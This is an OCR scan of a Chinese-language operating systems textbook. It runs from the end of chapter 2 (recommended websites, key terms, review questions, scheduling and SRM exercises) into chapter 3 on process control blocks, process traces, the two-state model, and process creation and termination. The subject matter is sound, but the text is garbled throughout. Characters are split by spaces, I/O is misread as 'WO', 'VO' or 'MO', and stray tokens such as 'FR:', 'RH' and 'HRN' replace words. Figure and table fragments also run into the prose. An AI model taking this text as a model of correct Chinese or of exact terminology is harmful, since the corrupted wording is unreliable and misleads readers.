VAHA96 Vahalia,U.UNIX Internals:The New Frontiers. Upper Saddle River,NJ:Prentice Hall,1996. 


推荐 网 站 


@ The Operating System Resource Center: 收集 了 许多 关于 操作 系统 的 有 用 的 文档 和 论文 。 

@ Review of Operating Systems: 关于 商业 的 、 免 费 的 、 研 究 的 和 业余 爱好 的 各 种 操作 系统 的 全 面 
的 综述 。 

@ Operating System Technical Comparison: 包括 各 种 操作 系统 的 大 量 翔 实 的 信息 。 

@ ACM Special Interest Group on Operating Systems: 关于 SIGOPS 出 版 物 和 会 议 的 信息 。 

@ IEEE Technical Committee on Operating Systems and Application Enviroments: 包括 在 线 的 新 
闻 和 其 他 网 站 的 链接 。 

@ The comp.os.research FAQ: 很 多 关于 操作 系统 设计 的 有 价值 的 FAQ。 

@ UNIX Guru Universe: 关于 UNIX 源码 的 非常 好 的 信息 。 

@ Linux Documentation Project: 名 字 描述 了 这 个 站 点 的 内 容 。 

@ IBM's Linux Web site: 提供 了 广泛 的 Linux 技术 和 用 户 信 息 。 其 上 许多 内 容 是 针对 IBM 产品 的 ， 
但 是 有 很 多 有 价值 的 通用 的 技术 信息 。 

@ Windows Development: Windows 内 部 结构 方面 的 很 好 的 信息 源 。 
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2.10 ”关键 术语 、 复 习题 和 习题 


关键 术语 
批 处 理 管 程 物理 地 址 串 行 处 理 
批 处 理 系 统 单 体内 核 特权 指令 对 称 多 处 理 
执行 上 下 文 多 道 批 处 理 系统 进程 任务 
中 断 多 道 程序 设计 进程 状态 线程 
作业 多 任务 实地 址 分 时 
作业 控制 语言 多 线程 常 驻 监控 程序 分 时 系统 
内 核 内 核 时 间 片 轮转 单 道 程序 设计 
内 存 管 理 操作 系统 (OS) 调度 虚 地 址 
微 内 核 

复习 题 

2.1 操作 系统 设计 的 三 个 目标 是 什么 ? 

2.2 什么 是 操作 系统 的 内 核 ? 

2.3 ”什么 是 多 道 程 序 设计 ? 

2.4 什么 是 进程 ? 

2.5 ”操作 系统 是 怎么 使 用 进程 上 下 文 的 ? 

2.6 列 出 并 简要 介绍 五 种 典型 的 操作 系统 的 存储 管理 职责 . 

2.7 解释 实地 址 和 虚 地 址 的 区 别 。 

2.8 描述 时 间 片 轮转 调度 技术 。 

2.9 解释 单 体内 核 和 微 内 核 的 区 别 。 

2.10 ”什么 是 多 线程 ? 

习题 


2.1 


2.2 


2.3 


2.4 


2.5 


假设 我 们 有 一 台 多 道 程序 的 计算 机 ， 每 个 作业 有 相同 的 特征 。 在 一 个 计算 周期 中， 一 个 作业 有 一 半 
时 间 花 费 在 WO 上 ， 另 一 半 用 于 处 理 器 的 活动 。 每 个 作业 一 共 运 行 N 个 周期 。 假 设 使 用 简单 的 时 间 片 
轮转 调度 ， 并 且 LO 操作 可 以 与 处 理 器 操作 重 倒 。 定 义 以 下 量 : 

© 时 间 周 期 = 完成 任务 的 实际 时 间 

e 吞吐 量 二 每 个 时 间 周 期 7 内 平均 完成 的 作业 数目 

o 处 理 器 利用 率 = 处 理 器 活跃 (不 是 处 于 等 待 ) 的 时 间 的 百分比 

当 周 期 了 分 别 按 下 列 方式 分 布 时 ， 对 1 个 、2 个 和 4 个 同时 发 生 的 作业 ， 请 计算 这 些 量 ; 

a) 前 一 半 用 于 WO， 后 一 半 用 于 处 理 器 

b) 前 四 分 之 一 和 后 四 分 之 一 用 于 MO ， 中 间 部 分 用 于 处 理 器 

IO 密集 型 的 程序 是 指 如 果 单 独 运行 ， 则 花费 在 等 待 VO 上 的 时 间 比 使 用 处 理 器 的 时 间 要 多 的 程序 。 
处 理 器 密集 型 的 程序 则 相反 。 假 设 短期 调度 算法 偏爱 那些 在 近期 使 用 处 理 器 时 间 较 少 的 程序 ， 请 解释 
为 什么 这 个 算法 偏爱 VO 密集 型 的 程序 ,但 是 并 不 是 永远 不 受理 处 理 器 密集 型 程序 所 需 的 处 理 器 
时 间 ? 

a) 解释 操作 系统 从 简单 批 处 理 系统 发 展 为 多 道 批 处 理 系统 的 原因 。 

b) 解释 操作 系统 从 多 道 批 处 理 系 统 发 展 为 分 时 系统 的 原因 。 

为 什么 用 户 态 和 内 核 态 的 设计 被 认为 是 好 的 操作 系统 设计 ? 举例 说 明 一 个 进程 从 用 户 态 切换 到 内 核 
态 ， 然 后 又 返回 到 用 户 态 的 过 程 。 

在 IBM 的 主机 操作 系统 OS/390 中 ， 内 核 中 的 一 个 重要 模块 是 系统 资源 管理 程序 (System Resource 
Manager，SRM )， 它 负责 地 址 空间 ( 进程 ) 之 间 的 资源 分 配 。SRM 使 得 OS/390 在 操作 系统 中 具有 特 
殊 性 ， 没 有 任何 其 他 的 主机 操作 系统 ， 当 然 也 没有 任何 其 他 类 型 的 操作 系统 可 以 比 得 上 SRM 所 实现 
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的 功能 。 资 源 的 概念 包括 处 理 器 、 实 存 和 IO 通道 ，SRM 累加 器 、LIO 通道 和 各 种 重要 数据 结构 的 利 
用 率 , 它 的 目标 是 基于 性 能 监视 和 分 析 提 供 最 优 的 性 能 , 其 安装 设置 了 以 后 的 各 种 性 能 目标 作为 SRM 
的 指南 , 这 会 基于 系统 的 利用 率 动态 地 修改 安装 和 作业 性 能 特点 。SRM 依次 提供 报告 ， 允 许 受 过 训练 
的 操作 员 改 进 配 置 和 参数 设置 ， 以 改善 用 户 服务 。 

现在 关注 SRM 活动 的 一 个 实例 。 实 存 被 划分 为 成 千 上 万 个 大 小 相等 的 块 ， 称 做 帧 。 每 个 帧 可 以 
保留 一 块 称 做 页 的 虚拟 内 存 。SRM 每 秒 大 约 接收 20 次 控制 ， 并 在 互相 之 间 以 及 每 个 页 面 之 间 进 行 检 
查 。 如 果 页 没有 被 引用 或 被 改变 ， 计 数 器 增 1。 一 段 时 间 后 SRM 求 这 些 数 的 平均 值 ， 以 确定 系统 中 
一 个 页 面 未 曾 被 触及 的 平均 秘 数 。 这 样 做 的 目的 是 什么 ? SRM 将 采取 什么 动作 ? 





现代 操作 系统 最 基础 的 任务 就 是 进程 管理 。 操 作 系 统 必 须 为 进程 分 配 资源 ,使 进程 间 可 以 交 
换 信 息 ， 保 护 各 个 进程 的 资源 不 被 其 他 进程 占用 ， 并 且 使 进程 可 以 同步 。 为 了 达到 这 些 要 求 ， 操 
作 系 统 必须 为 每 一 个 进程 维护 一 个 数据 结构 , 这 个 数据 结构 描述 进程 的 状态 和 资源 所 有 权 , RH 
才能 使 操作 系统 进行 进程 控制 。 

在 单 处 理 器 多 道 程序 系统 中 ,多 个 进程 的 执行 可 以 在 同一 时 间 交 又 进行 ,在 多 处 理 器 系统 中 ， 
不 仅 多 个 进程 可 以 交叉 执行 , 而 且 可 以 同步 执行 。 交叉 执行 和 同步 执行 都 属于 并 发 执行 这 将 给 
应 用 程序 员 和 操作 系统 带 来 一 些 难题 。 

线程 概念 的 引入 ， 也 给 许多 当代 的 操作 系统 中 的 进程 管理 带 来 困难 。 在 一 个 多 线程 系统 中 ， 
进程 保留 着 资源 所 有 权 的 属性 ， 而 多 个 并 发 执行 流 是 执行 在 进程 中 运行 的 线程 。 


第 二 部 分 导读 


第 3 章 进程 描述 和 控制 


传统 的 操作 系统 的 主要 任务 是 进程 管理 。 每 一 个 进程 在 任何 时 间 内 都 处 于 一 组 执行 状态 中 的 
一 种 情况 : 就 绪 态 、 运 行 态 和 阻塞 态 。 操 作 系统 跟踪 这 些 执行 状态 ， 并 且 管 理 进程 在 这 些 状态 间 
的 转换 过 程 。 为 了 达到 这 个 目的 ,操作 系统 通过 相当 精细 的 数据 结构 来 表述 每 个 进程 。 操 作 系 统 
必须 实现 调度 功能 , 并 且 为 进程 间 的 共享 和 同步 提供 便利 。 第 3 章 讲述 了 典型 操作 系统 中 进程 管 
理 所 使 用 到 的 数据 结构 和 技术 。 


第 4 章 : 线程 、 对 称 多 处 理 ( SMP ) 和 微 内 核 


第 4 章 涵 盖 了 三 个 领域 , 这 三 个 领域 是 许多 现代 操作 系统 的 主要 特征 , 并 且 是 比 传统 操作 系 
统 更 先进 的 标志 。 在 许多 操作 系统 中 ,传统 的 进程 概念 被 分 为 两 部 分 : 一 部 分 负责 管理 资源 所 有 
权 (进程 ); 另 一 个 部 分 负责 指令 流 的 执行 ( 线程 )。 一 个 单独 的 进程 可 能 包含 多 个 线程 。 使 用 多 
线程 的 组 织 方 法 对 程序 的 结构 化 和 性 能 方面 都 有 很 大 帮助 。 第 4 章 还 讲述 了 对 称 多 处 理 机 (SMP )， 
SMP 是 一 个 拥有 多 处 理 器 的 计算 机 系统 ， 其 中 的 每 一 个 处 理 器 都 可 以 执行 所 有 程序 和 系统 代码 。 
SMP 的 组 织 方法 增强 了 系统 的 性 能 和 可 靠 性 。SMP 通常 和 多 线程 机 制 一 起 使 用 ， 即 使 没有 多 线 
程 也 能 大 幅 提 高 系统 性 能 。 最 后 , 第 4 章 将 讲述 微 内 核 , 微 内 核 是 操作 系统 为 了 减少 运行 在 内 核 
态 的 代码 量 的 一 种 设计 方式 ， 并 且 分 析 了 这 种 方法 的 优点 。 


第 5 章 : FR: 互 斥 和 同步 


当今 操作 系统 的 两 个 中 心 主题 是 多 道 程序 和 分 布 式 处 理 , 并 发 是 这 两 个 主题 的 基础 ， 同 时 也 
是 操作 系统 设计 技术 的 基础 。 第 5 章 讲 述 了 并 发 控制 的 两 个 方面 : 互 斥 和 同步 。 互 斥 是 多 进程 (或 
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多 线程 ) 共享 代码 、 资 源 或 数据 并 使 得 在 一 个 时 间 内 只 允许 一 个 进程 访问 共享 对 象 的 一 种 能 力 。 
与 互 斥 相关 联 的 是 同步 多 进程 根据 信息 的 交换 协调 它们 活动 的 能 力 。 第 5 章 以 一 个 关于 并 发 设 
计 的 讨论 开始 , 提出 了 关于 并 发 的 一 些 设计 问题 。 这 一 章 还 对 并 发 的 硬件 支持 进行 了 讨论 , 还 有 
支持 并 发 最 重要 的 机 制 : 信号 量 、 管 程 和 消息 传递 。 


第 6 章 : 并 发 : 死 锁 和 饥饿 


第 6 章 讲述 了 并 发 控制 的 另外 两 个 方面 。 死 锁 是 这 样 一 种 情况 : 一 组 进程 中 的 两 个 或 多 个 进 
程 要 等 待 该 组 中 的 其 他 成 员 完 成 一 个 操作 后 才能 继续 运行 , 但 是 没有 成 员 可 以 继续 。 死 锁 是 一 个 
很 难 预测 的 现象 , 并且 没 有 上 比较 容易 的 通用 解决 方法 。 第 6 章 将 提出 处 理 死 锁 问题 的 三 个 主要 手 
A: 预防 、 避 免 和 检测 。 饥 饶 是 一 个 准备 运行 的 进程 由 于 其 他 进程 的 运行 而 一 直 不 能 访问 处 理 器 
的 情况 。 从 大 的 方面 说 ， 饥 饿 是 被 当成 调度 问题 来 处 理 的 ， 第 四 部 分 将 会 讲述 。 尽 管 第 6 章 的 中 
心 是 死 锁 ， 但 是 也 在 解决 死 锁 的 内 容 中 提 到 了 饥饿， 因为 解决 死 锁 问题 要 避免 带 来 饥饿 问 题 。 


第 3 章 ”进程 描述 和 控制 


操作 系统 的 设计 必须 反映 某 些 一 般 性 的 要 求 。 所 有 多 道 程 序 操作 系统 ， 从 诸如 Windows 98 
的 单 用 户 系统 到 诸如 IBM z/OS 的 可 支持 成 千 上 万 个 用 户 的 主机 系统 ， 它 们 的 创建 都 围绕 着 进程 
的 概念 。 因 此 ， 操 作 系 统 必须 满足 的 大 多 数 需 求 表示 都 涉及 进程 : 

o 操作 系统 必须 交替 执行 多 个 进程 ， 在 合理 的 响应 时 间 范 围 内 使 处 理 器 的 利用 率 最 大 。 

© 操作 系统 必须 按照 特定 的 策略 ( 例如 某 些 函数 或 应 用 程序 具有 较 高 的 优先 级 ) 给 进程 分 

配 资源 ， 同 时 避免 死 锁 9 。 

@ 操作 系统 可 以 支持 进程 间 的 通信 和 用 户 创建 进程 ， 它 们 对 构造 应 用 程序 很 有 帮助 。 

现在 开始 从 分 析 操 作 系 统 表示 和 控制 进程 的 方式 来 深入 地 学 习 操作 系统 ,首先 介绍 进程 的 概 
Z, 讨论 进程 状态 , 进程 状态 描述 了 进程 的 行为 特征 ; 接着 着 眼 于 操作 系统 表示 每 个 进程 的 状态 
所 需要 的 数据 结构 ， 和 操作 系统 为 实现 其 目标 所 需要 的 进程 的 其 他 特征 ; 然后 看 操作 系统 是 如 何 
使 用 这 些 数据 结构 控制 进程 的 执行 的 ; 最 后 ,讨论 了 UNIX SVR4 中 的 进程 管理 。 第 4 章 提供 了 
更 多 的 现在 操作 系统 ( 如 Solaris, Windows 和 Linux) 的 进程 管理 的 例子 。 

注意 ， 在 本 章 中 ,偶尔 会 引用 到 虚拟 内 存 。 大 多 数 时 候 ， 在 处 理 进程 时 可 以 忽略 这 个 概念 ， 
但 某 些 地 方 需要 考虑 起 拟 内 存 的 概念 。 虚拟 内 存在 第 8 章 才 会 详细 讲述 , 但 在 第 2 章 中 曾 有 过 简 
单 的 概述 。 

3.1 什么 是 进程 
3.1.1 背景 
在 给 进程 下 定义 之 前 ， 首 先 总 结 一 下 第 1 章 和 第 2 章 介 绍 的 一 些 概 念 : 
1) 一 个 计算 机 平台 包括 一 组 硬件 资源 ， 比 如 处 理 器 、 内 存 、LIO 模块 、 定 时 器 和 磁盘 驱动 
器 等 。 
2) 计算 机 程序 是 为 执行 某 些 任 务 而 开发 的 。 在 典型 的 情况 下 ， 它 们 接受 外 来 的 输入 ， 做 一 
些 处 理 之 后 ， 输 出 结果 。 

3) 直接 根据 给 定 的 硬件 平台 写 应 用 程序 效率 是 低下 的 ， 主 要 原因 如 下 : 

a) 针对 相同 的 平台 可 以 开发 出 很 多 应 用 程序 , 所 以 开发 出 这 些 应 用 程序 访问 计算 机 资源 
的 通用 例 程 是 很 有 意义 的 。 

b ) 处 理 器 本 身 只 能 对 多 道 程序 设计 提供 有 限 的 支持 , 需要 用 软件 去 管理 处 理 器 和 其 他 资 
源 同时 被 多 个 程序 共享 。 

c) 如 果 多 个 程序 在 同一 时 间 都 是 活路 的， 那么 需要 保护 每 个 程序 的 数据 、UO 使 用 和 其 
他 资源 不 被 其 他 程序 占用 。 

4) 开发 操作 系统 是 为 了 给 应 用 程序 提供 一 个 方便 、 安 全 和 一 致 的 接口 。 操 作 系 统 是 计算 机 

硬件 和 应 用 程序 之 间 的 一 层 软 件 ( 如 图 2.1 所 示 )， 对 应 用 程序 和 工具 提供 了 支持 。 


O 有 关 死 锁 的 内 容 将 在 第 6 章 讲述 。 从 本 质 上 看 ， 如 果 两 个 进程 为 了 继续 进行 而 需要 相同 的 两 个 资源 ， 而 它们 
每 人 都 拥有 其 中 的 一 个 资源 ， 这 时 就 会 发 生死 锁 。 每 个 进程 都 将 无 限 地 等 待 自己 没有 的 那个 资源 。 
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5) 可 以 把 操作 系统 想象 为 资源 的 统一 抽象 表示 ， 可 以 被 应 用 程序 请 求 和 访问 。 资 源 包括 内 
存 、 网 络 接口 和 文件 系统 等 。 一 旦 操作 系统 为 应 用 程序 创建 了 这 些 资 源 的 抽象 表示 ， 就 
必须 管理 它们 的 使 用 ， 例 如 一 个 操作 系统 可 以 允许 资源 共享 和 资源 保护 。 

有 了 应 用 程序 、 系统 软件 和 资源 的 概念 , 就 可 以 讨论 操作 系统 怎样 以 一 个 有 序 的 方式 管理 应 

用 程序 的 执行 ， 以 达到 以 下 目的 : 

@ 资源 对 多 个 应 用 程序 是 可 用 的 。 

© 物理 处 理 器 在 多 个 应 用 程序 间 切 换 以 保证 所 有 程序 都 在 执行 中 。 

O 处 理 器 和 LO 设备 能 得 到 充分 的 利用 。 

所 有 现代 操作 系统 采用 的 方法 都 是 依据 对 应 于 一 个 或 多 个 进程 存在 的 应 用 程序 执行 的 一 种 

模型 。 


3.1.2 ”进程 和 进程 控制 块 

第 2 章 给 进程 下 了 以 下 几 个 定义 : 

@ 正在 执行 的 程序 。 

o 正在 计算 机 上 执行 的 程序 实例 。 

o 能 分 配给 处 理 器 并 由 处 理 器 执行 的 实体 。 

@ 具有 以 下 特征 的 活动 单元 ，_- 组 指令 序列 的 执行 、_ 个 当前 状态 和 相关 的 系统 资源 集 。 

也 可 以 把 进程 当成 由 一 组 元 素 组 成 的 实体 ,进程 的 两 个 基本 的 元 素 是 程序 代码 ( 可 能 被 执行 
相同 程序 的 其 他 进程 共享 ) 和 代码 相关 联 的 数据 集 。 假 设 处 理 器 开始 执行 这 个 程序 代码 , HRN 
把 这 个 执行 实体 叫做 进程 。 在 进程 执行 时 ， 任意 给 定 一 个 时 间 ， 进程 都 可 以 唯一 地 被 表征 为 以 下 
RK: 
标识 符 ， 跟 这 个 进程 相关 的 唯一 标识 符 ， 用 来 区 别 其 他 进程 。 
状态 :如果 进 程 正在 执行 ， 那 么 进程 处 于 运行 态 。 
优先 级 ， 相 对 于 其 他 进程 的 优先 级 。 
程序 计数 器: 程序 中 即将 被 执行 的 下 一 条 指令 的 地 址 。 

内 存 指针 : 包括 程序 代码 和 进程 相关 数据 的 指针 ， 还 有 和 其 
他 进程 共享 内 存 块 的 指针 。 
@。 上 下 文 数据 :进程 执行 时 处 理 器 的 寄存 器 中 的 数据 。 
o 1/O 状态 信息 : 包括 显 式 的 I/O 请 求 、 分 配给 进程 的 I/O 设备 
(例如 磁带 驱动 器 ) 和 被 进程 使 用 的 文件 列表 等 。 
© 记 账 信息 :可 能 包括 处 理 器 时 间 总 和 、 使 用 的 时 钟 数 总 和 、 
时 间 限制 、 记 账号 等 。 

前 述 的 列表 信息 存放 在 一 个 叫做 进程 控制 块 (如 图 3.1 所 示 ) 的 
数据 结构 中 ,该 控制 块 由 操作 系统 创建 和 管理 。 比较 有 意义 的 一 点 是 ， 
进程 控制 块 包含 了 充分 的 信息 ， 这样 就 可 以 中 断 一 个 进程 的 执行 ,并 
目 在 后 来 恢复 执行 进程 时 就 好 像 进程 未 被 中 断 过 。 进 程控 制 块 是 操作 
系统 能 够 支持 多 进程 和 提供 多 处 理 的 关键 工具 。 当 进程 被 中 断 时 , we 
作 系 统 会 把 程序 计数 器 和 处 理 器 寄存 器 ( 上 下 文 数据 ) 保存 到 进程 控 
制 块 中 的 相应 位 置 ， 进程 状态 也 被 改变 为 其 他 的 值 ， 例如 阻塞 态 或 就 ， 图 31 得 化 的 进程 控制 
绪 态 (后 面 将 讲述 )， 现 在 操作 系统 可 以 自由 地 把 其 他 进程 设置 为 运行 态 ， 把 其 他 进程 的 程序 计 
数 器 和 进程 上 下 文 数据 加 载 到 处 理 器 寄存 器 中 ， 这 样 其 他 进程 就 可 以 开始 执行 了 。 

因此 ， 可 以 说 进程 是 由 程序 代码 和 相关 数据 还 有 进程 控制 块 组 成 。 对 于 一 个 单 处 理 器 计算 机 ， 
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3.2 ”进程 状态 


正如 前 面 所 提 到 的 ， 对 一 个 被 执行 的 程序 ,操作 系统 会 为 该 
程序 创建 一 个 进程 或 任务 。 从 处 理 器 的 角度 看 ， 它 在 指令 序列 中 


o 按 某 种 顺序 执行 指令 , 这 个 顺序 根据 程序 计数 器 寄存 器 中 不 断 变 
” 化 的 值 来 指示 , 程序 计数 器 可 能 指向 不 同 进程 中 不 同 部 分 的 程序 


代码 ; 从 程序 自身 的 角度 看 , 它 的 执行 涉及 程序 中 的 一 系列 指令 。 

可 以 通过 列 出 为 该 进程 执行 的 指令 序列 来 描述 单个 进程 的 
行为 ,这样 的 序列 称 做 进程 的 轨迹 。 可 以 通过 给 出 各 个 进程 的 轨 
迹 是 如 何 被 交替 的 来 描述 处 理 器 的 行为 。 

考虑 一 个 非常 简单 的 例子 ， 图 3.2 给 出 了 三 个 进程 在 内 存 中 
的 布局 ， 为 简化 讨论 ， 假 设 没有 使 用 虚拟 内 存 ， 因 此 所 有 三 个 进 
程 都 由 完全 载 人 内 存 中 的 程序 表示 ,此 外 ,有 一 个 小 的 分 派 器 9 使 
处 理 器 从 一 个 进程 切换 到 另 一 个 进程 。 图 3.3 给 出 了 这 三 个 进程 
在 执行 过 程 早期 的 轨迹 ,给 出 了 进程 A 和 C 中 最 初 执行 的 12 条 
HS, 进程 B 执行 4 条 指令 , 假设 第 4 条 指令 调用 了 进程 必须 等 
待 的 WO 操作 。 

现在 从 处 理 器 的 角度 看 这 些 轨 迹 。 图 3.4 给 出 了 最 初 的 52 
个 指令 周期 中 交替 的 轨迹 ( 为 方便 起 见 ， 指 令 周 期 都 给 出 了 编 


地 址 ”内 存 程序 计数 器 
O 000+ 


o ee 


5000 | 一 一 


8000 


12000 





图 3.2 在 指令 周期 13 时 的 执行 


快照 (如 图 3.4 所 示 ) 


号 )。 在 图 中 ， 阴 影 部 分 代表 由 分 配器 执行 的 代码 。 在 每 个 实例 中 由 分 派 器 执行 的 指令 顺序 是 相 
同 的 , 因为 是 分 派 器 的 同一 个 功能 在 执行 。 假 设 操作 系统 仅 允 许 一 个 进程 最 多 连续 执行 6 全 指令 
周期 ,在 此 之 后 将 被 中 断 ， 这 避免 了 任何 一 个 进程 独占 处 理 器 时 间 。 如 图 3.4 所 示 , 进程 A 最 初 
”的 6 条 指令 被 执行 ， 接 下 来 是 一 个 超时 并 执行 分 派 器 的 某 些 代 码 ， 在 控制 转移 给 进程 B 之 前 分 
派 器 执行 了 6 条 指令 9 ,在 进程 B 的 4 条 指令 被 执行 后 ,进程 B 请 求 一 个 它 必 须 等 待 的 IO 动作 ， 
因此 ， 处 理 器 停止 执行 进程 B， 并 通过 分 派 器 转移 到 进程 C。 在 超时 后 ， 处 理 器 返回 进程 A， 当 
这 次 处 理 超时 时 ， 进 程 B 仍然 等 待 那个 MO 操作 的 完成 ， 因 此 分 派 器 再 次 转移 到 进程 C。 


a) 进程 A 的 轨迹 


b) 进程 B 的 轨迹 


5000 表示 进程 A 的 程序 起 始 地 址 
8000 表示 进程 B 的 程序 起 始 地 址 
12 000 表示 进程 C 的 程序 起 始 地 址 


图 3.3 图 3.2 中 进程 的 轨迹 


O 分 派 器 即 为 调度 器 。 一 一 译 者 注 





c) 进程 C 的 轨迹 


O 进程 只 执行 了 很 少 的 几 条 指令 ， 并 且 分 派 器 也 是 超常 的 低速 ， 这 样 的 设想 完全 是 为 了 简化 讨论 。 
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12002 


12003 





100 表示 调度 器 程序 的 起 始 地 址 
阴影 表示 调度 器 程序 的 执行 

第 1 列 和 第 3 列 是 对 指令 周期 的 计数 

第 2 列 和 第 4 列 给 出 了 被 执行 的 指令 地 址 


图 3.4 图 3.2 中 进程 的 组 合 轨 迹 


3.2.1 两 状态 进程 模型 


操作 系统 的 基本 职责 是 控制 进程 的 执行 , 这 包括 确定 交替 执行 的 方式 和 给 进程 分 配 资源 。 在 
设计 控制 进程 的 程序 时 ， 第 一 步 就 是 描述 进程 所 表现 出 的 行为 。 

通过 观察 可 知 ,在 任何 时 刻 ， 一 个 进程 要 么 正在 执行 , 要 么 没有 执行 ,因而 可 以 构造 最 简单 
的 模型 。 一 个 进程 可 以 处 于 以 下 两 种 状态 之 一 : 运行 态 或 未 运行 态 ， 如 图 3.5a 所 示 。 当 操作 系 
统 创 建 一 个 新 进程 时 ， 它 将 该 进程 以 未 运行 态 加 入 到 系统 中 ， 操 作 系统 知道 这 个 进程 是 存在 的 ， 
并 正在 等 待 执行 机 会 。 当 前 正在 运行 的 进程 不 时 地 被 中 断 , 操作 系统 中 的 分 派 器 部 分 将 选择 一 个 
新 进程 运行 。 前 一 个 进程 从 运行 态 转换 到 未 运行 态 ， 另 外 一 个 进程 转换 到 运行 态 。 

从 这 个 简单 的 模型 可 以 意识 到 操作 系统 的 一 些 设计 元 素 。 必 须 用 某 种 方式 来 表示 每 个 进程 ， 
使 得 操作 系统 能 够 跟踪 它 , 也 就 是 说 , 必须 有 一 些 与 进程 相关 的 信息 , 包括 进程 在 内 存 中 的 当前 
状态 和 位 置 ， 即 进程 控制 块 。 未 运行 的 进程 必须 保持 在 某 种 类 型 的 队列 中 , 并 等 待 它们 的 执行 时 
机 。 图 3.5b 给 出 了 一 个 结构 ， 结 构 中 有 一 个 队列 ， 队 列 中 的 每 一 项 都 指向 某 个 特定 进程 的 指针 ， 
或 队列 可 以 由 数据 块 构成 的 链表 组 成 ， 每 个 数据 块 表示 一 个 进程 。 

可 以 用 该 排队 图 描述 分 派 器 的 行为 。 被 中 断 的 进程 转移 到 等 待 进程 队列 中 , 或 者 , 如 果 进 程 
已 经 结束 或 取消 ， 则 被 销毁 ( 离开 系统 )。 在 任何 一 种 情况 下 ， 分 派 器 均 从 队列 中 选择 一 个 进程 
来 执行 。 
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分 派 





暂停 
a) 状态 变迁 图 








b ) 排队 图 
A35 两 状态 进程 模型 


3.2.2 ”进程 的 创建 和 终止 


在 对 简单 的 两 状态 模型 进行 改进 之 前 , 有 必要 讨论 一 下 进程 的 创建 和 终止 。 无 论 使 用 哪 种 进 
程 行为 模型 ， 进 程 的 生存 期 都 围绕 着 进程 的 创建 和 终止 。 


进程 的 创建 | 

当 一 个 新 进程 添加 到 那些 正在 被 管理 的 进程 集合 中 去 时 ,操作 系统 需要 建立 用 于 管理 该 进程 
的 数据 结构 ( 见 3.3 节 )， 并 在 内 存 中 给 它 分 配 地 址 空间 。 我 们 将 在 3.3 节 中 讲述 这 些 数 据 结构 ， 
这 些 行为 构成 了 一 个 新 进程 的 创建 过 程 。 

通常 有 4 个 事件 会 导致 创建 一 个 进程 ， 如 表 3.1 所 示 。 在 批 处 理 环 境 中 ， 响 应 作业 提交 时 会 
创建 进程 ; 在 交互 环境 中 ， 当 一 个 新 用 户 试图 登录 时 会 创建 进程 。 不 论 在 哪 种 情况 下 ， 操作 系 统 
都 负责 新 进程 的 创建 , 操作 系统 也 可 能 会 代表 应 用 程序 创建 进程 。 例 如 ,如 果 用 户 请 求 打 印 一 个 
文件 , 则 操作 系统 可 以 创建 一 个 管理 打印 的 进程 ,进而 使 请 求 进程 可 以 继续 执行 ,与 完成 打印 任 
务 的 时 间 无 关 。 


表 3.1 导致 进程 创建 的 原因 
x 6 说 有 阴 
新 的 批 处 理 作业 通常 位 于 磁带 或 磁盘 中 的 批 处 理 作业 控制 流 被 提供 给 操作 系统 。 当 操作 
系统 准备 接纳 新 工作 时 ， 它 将 读 取 下 一 个 作业 控制 命令 
交互 登录 终端 用 户 登 录 到 系统 
操作 系统 可 以 创建 一 个 进程 ， 代 表 用 户 程序 执行 一 个 功能 ， 使 用 户 无 需 
操作 系统 因为 提供 一 项 服务 而 创建 等 待 (如 控制 打印 的 进程 ) 
基于 模块 化 的 考虑 ， 或 者 为 了 开发 并 行 性 ， 用 户 种 序 可 以 指示 创建 多 个 
进程 


传统 地 , 操作 系统 创建 进程 的 方式 对 用 户 和 应 用 程序 都 是 透明 的 , 这 在 当代 操作 系统 中 也 很 
普遍 。 但 是 ,允许 一 个 进程 引发 男 一 个 进程 的 创建 将 是 很 有 用 的 。 例 如 ,一 个 应 用 程序 进程 可 以 
产生 另 一 个 进程 ， 以 接收 应 用 程序 产生 的 数据 , 并 将 数据 组 织 成 适合 以 后 分 析 的 格式 。 新 进程 与 
应 用 程序 并 行 地 运行 , 并 当 得 到 新 的 数据 时 被 激活 。 这 个 方案 对 构造 应 用 程序 是 非常 有 用 的 , 例 
Wm, 服务 器 进程 (如 打印 服务 器 、 文 件 服务 器 ) 可 以 为 它 处 理 的 每 个 请 求 产 生 一 个 新 进程 。 当 操 
作 系统 为 另 一 个 进程 的 显 式 请 求 创建 一 个 进程 时 ， 这 个 动作 称 为 进程 派生 。 


由 现 有 的 进程 派生 
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当 一 个 进程 派生 另 一 个 进程 时 ,前 一 个 称 做 父 进程 , 被 派生 的 进程 称 做 子 进程 。 在 典型 的 情 
次 下 ， 相 关 进 程 需要 相互 之 间 的 通信 和 合作 。 对 程序 员 来 说 ,合作 是 一 个 非常 困难 的 任务 ， 相 关 
主题 将 在 第 5 章 讲述 。 
进程 终止 

表 3.2 概括 了 进程 终止 的 典型 原因 。 任 何 一 个 计算 机 系统 都 必须 为 进程 提供 表示 其 完成 的 
方法 ， 批 处 理 作业 中 应 该 包含 一 个 Halt 指令 或 用 于 终止 的 操作 系统 显 式 服务 调用 来 终止 。 在 
前 一 种 情况 下 ，Halt 指令 将 产生 一 个 中 断 , 警告 操作 系统 一 个 进程 已 经 完成 。 对 交互 式 应 用 程 
F, 用户 的 行为 将 指出 何 时 进程 完成 , 例如， 在 分 时 系统 中 ， 当 用 户 退 出 系统 或 关闭 自己 的 终 
端 时 ， 该 用 户 的 进程 将 被 终止 。 在 个 人 计算 机 或 工作 站 中 ,用 户 可 以 结束 一 个 应 用 程序 ( 如 字 
处 理 或 电子 表格 )。 所 有 这 些 行为 最 终 导 致 发 送 给 操作 系统 的 一 个 服务 请 求 ， 以 终止 发 出 请 求 
的 进程 。 

此 外 ， 很 多 错误 和 故障 条 件 会 导致 进程 终止 。 表 3.2 列 出 了 一 些 最 常见 的 识别 条 件 e 。 

最 后 ， 在 有 些 操作 系统 中 ， 进 程 可 以 被 创建 它 的 进程 终止 ， 或 当 父 进程 终止 时 而 终止 。 


表 3.2 ”导致 进程 终止 的 原因 








事 件 说 RA 
正常 完成 进程 自行 执行 一 个 操作 系统 服务 调用 ， 表 示 它 已 经 结束 运行 
进程 运行 时 间 超 过 规定 的 时 限 。 可 以 测量 很 多 种 类 型 的 时 间 ， 包 括 总 的 运行 时 
超过 时 限 间 (“挂钟 时 间 " )、 花 费 在 执行 上 的 时 间 以 及 对 于 交互 进程 从 上 一 次 用 户 输入 到 当 
前 时 刻 的 时 间 总 量 
无 可 用 内 存 系统 无 法 满足 进程 需要 的 内 存 空间 
越界 进程 试图 访问 不 允许 访问 的 内 存单 元 
保护 错误 进程 试图 使 用 不 允许 使 用 的 资源 或 文件 ， 或 者 试图 以 一 种 不 正确 的 方式 使 用 ， 
如 往 只 读 文件 中 写 
